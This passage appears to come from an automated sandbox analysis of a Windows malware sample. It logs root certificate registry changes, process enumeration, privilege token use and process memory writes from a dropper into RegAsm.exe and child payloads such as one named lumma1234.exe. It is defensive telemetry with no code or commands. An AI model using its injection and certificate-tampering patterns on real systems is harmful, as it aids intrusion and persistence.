Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A1DB6393916F17E4185509400415C70240B0AE6B C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F517A24F9A48C6C9F8A200269FDC0F482CAB3089 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\9C615C4D4D85103A5326C24DBAEAE4A2D2D5CC97 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0B7199A1C7F3ADDF7BA7EAB8EB574AE80D60DDDE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1EAC3E5B82476E9D50B1EC67D2CC11E12E0B491 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\28903A635B5280FAE6774C0B6DA7D6BAA64AF2E8 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0B77BEBBCB7AA24705DECC0FBD6A02FC7ABD9B52 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F9B5B632455F9CBEEC575F80DCE96E2CC7B278B7 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDE1D2A901802E1D875E84B3807E4BB1FD994134 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\9957C53FC59FB8E739F7A4B7A70E9B8E659F208C C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\786A74AC76AB147F9C6A3050BA9EA87EFE9ACE3C C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\80BF3DE9A41D768D194B293C85632CDBC8EA8CF7 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D2441AA8C203AECAA96E501F124D52B68FE4C375 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\9ED18028FB1E8A9701480A7890A59ACD73DFF871 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\342CD9D3062DA48C346965297F081EBC2EF68FDC C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E7A19029D3D552DC0D0FC692D3EA880D152E1A6B C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\590D2D7D884F402E617EA562321765CF17D894E9 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\EABDA240440ABBD694930A01D09764C6C2D77966 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4F555CE20DCD3364E0DC7C41EFDD40F50356C122 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CBA1C5F8B0E35EB8B94512D3F934A2E90610D336 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\C4674DDC6CE2967FF9C92E072EF8E8A7FBD6A131 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8250BED5A214433A66377CBC10EF83F669DA3A67 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5F4E1FCF31B7913B850B54F6E5FF501A2B6FC6CF\Blob = 0300000001000000140000005f4e1fcf31b7913b850b54f6e5ff501a2b6fc6cf09000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b060105050703090b000000010000001c0000004b00490053004100200052006f006f00740043004100200033000000200000000100000056050000308205523082043aa003020102020102300d06092a864886f70d01010505003064310b3009060355040613024b52310d300b060355040a13044b495341312e302c060355040b13254b6f7265612043657274696669636174696f6e20417574686f726974792043656e7472616c311630140603550403130d4b49534120526f6f7443412033301e170d3034313131393036333935315a170d3134313131393036333935315a3064310b3009060355040613024b52310d300b060355040a13044b495341312e302c060355040b13254b6f7265612043657274696669636174696f6e20417574686f726974792043656e7472616c311630140603550403130d4b49534120526f6f744341203330820120300d06092a864886f70d01010105000382010d00308201080282010100debaed1765aed1bd4a3dacdb8072cc58e1e7e193dacc307acfef0bae2da743abbfa742cf085608a4471d7dfa86efd830972634613c800ef8d4eb9ffc22301ba16d3ee34cd2554e164037c2f6076edb07b5a58c9681e29b5c7e9461c8ce843cb1fa00e672d3098577e9dc5e214fb4e44ef4e217ab50af1cffa13958755b12b296b98df07062485b56282aa5879136b91e24f5b9ba7bb652515b175a60056c9cc2e6c68c3ef9eadd3c8cff89de4370ac1db8f175cd38ca530d47686ac63c18cabde1b4be0ef4d0e3d213fab0511111d441abe8f4398ee134844f0b93aa6a38fce5c67847ae7617faa1803706001508fd6b238efa720d95d64b62b168c2dd349b5d020103a382020f3082020b301f0603551d230418301680148f81f0daa6cd743cbe66f4156b46a4fe0628ccaa301d0603551d0e041604148f81f0daa6cd743cbe66f4156b46a4fe0628ccaa300e0603551d0f0101ff0404030201063082012e0603551d2004820125308201213082011d0604551d200030820113303006082b060105050702011624687474703a2f2f7777772e726f6f7463612e6f722e6b722f7263612f6370732e68746d6c3081de06082b060105050702023081d11e81cec7740020c778c99dc11cb2940020acf5c778c778c99dc11cc785b2c8b2e4002800540068006900730020006300650072007400690066006900630061007400650020006900730020006100630063007200650064006900740065006400200075006e00640065007200200045006c0065006300740072006f006e006900630020005300690067006e0061007400750072006500200041006300740020006f00660020007400680065002000520065007000750062006c006900630020006f00660020004b006f007200650061002930330603551d11042c302aa42830263124302206035504030c1bed959ceab5adeca095ebb3b4ebb3b4ed98b8eca784ed9da5ec9b9030330603551d12042c302aa42830263124302206035504030c1bed959ceab5adeca095ebb3b4ebb3b4ed98b8eca784ed9da5ec9b90300f0603551d130101ff040530030101ff300c0603551d2404053003800100300d06092a864886f70d01010505000382010100cfd6f70efdb08c6e05158ea85c2bb25ad11e57a65e18aa821108fc99b75ba7e3c8d2a2d3f92434f7e3e4ae895447d36949c980c111ebe229c7f6068b5fbae25ecfabc3cecfee9225dc9f391e0e03f4de905ba170995cc7734ec9a475497b25a19f82928d4dec61c50c32a7c7383880553a2a831d9c6479b90da7354a68ef8fff05d8ba4e5661d8f84a7098089693d860c73aec5f9f1d2b354f4814a19abb6feed2038653f110c70754625e368ee21c2b1d174de6f55aef8aba82e877d928117e37874a940ac940e935a53afb643ef25f167af376d7ceee3f441d45aa5f11aa531c3a1f525162540fa39035cf4d6fbac7be2c09f135f801bb24dd30bc480feed9 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 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 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D2441AA8C203AECAA96E501F124D52B68FE4C375\Blob = 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 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\16D86635AF1341CD34799445EB603E273702965D\Blob = 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 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\253F775B0E7797AB645F15915597C39E263631D1\Blob = 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 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\23E833233E7D0CC92B7C4279AC19C2F474D604CA C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob = 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 C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
N/A N/A C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
N/A N/A C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
N/A N/A C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Token: SeBackupPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1952 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 1952 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 1952 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 1392 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 1392 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 1392 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5000 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1392 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 1392 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 1392 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 4208 wrote to memory of 3728 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 4208 wrote to memory of 3728 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 4208 wrote to memory of 3728 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 4208 wrote to memory of 4292 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
PID 4208 wrote to memory of 4292 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
PID 1392 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 1392 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 1392 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 1392 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
PID 1392 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
PID 1392 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
PID 3160 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
